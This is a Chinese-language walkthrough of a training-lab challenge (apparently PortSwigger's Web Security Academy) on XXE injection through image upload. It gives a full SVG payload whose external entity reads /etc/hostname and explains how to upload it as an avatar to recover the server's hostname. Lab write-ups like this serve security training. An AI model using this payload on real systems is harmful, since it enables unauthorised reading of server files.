bp官方靶场xml外部实体（XXE）注入漏洞8

第八关 通过图像文件上传利用 XXE

这一关就是通过 文件上传功能 利用 XXE 漏洞，读取服务器上的敏感文件

提示：1、靶场允许用户将头像附加到评论中，并使用 Apache Batik 库来处理头像图像文件。

2、要解决实验室问题，请上传一张图像，该图像在处理后显示 /etc/hostname 文件的内容。然后使用“提交解决方案”按钮提交服务器主机名的值。

3、SVG 图像格式使用 XML。

具体操作：

1、先创建包含以下内容的本地SVG图像:

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>

2、在博客文章上发表评论，并将此图像作为头像上传。

上传创建的1.svg

然后跳转到“Your comment has been submitted.”

然后返回上一页

这就是新上传的图像，选中图像，鼠标右键打开新的标签页

复制下主机名：3f3a07835d2b

提交主机名，靶场过关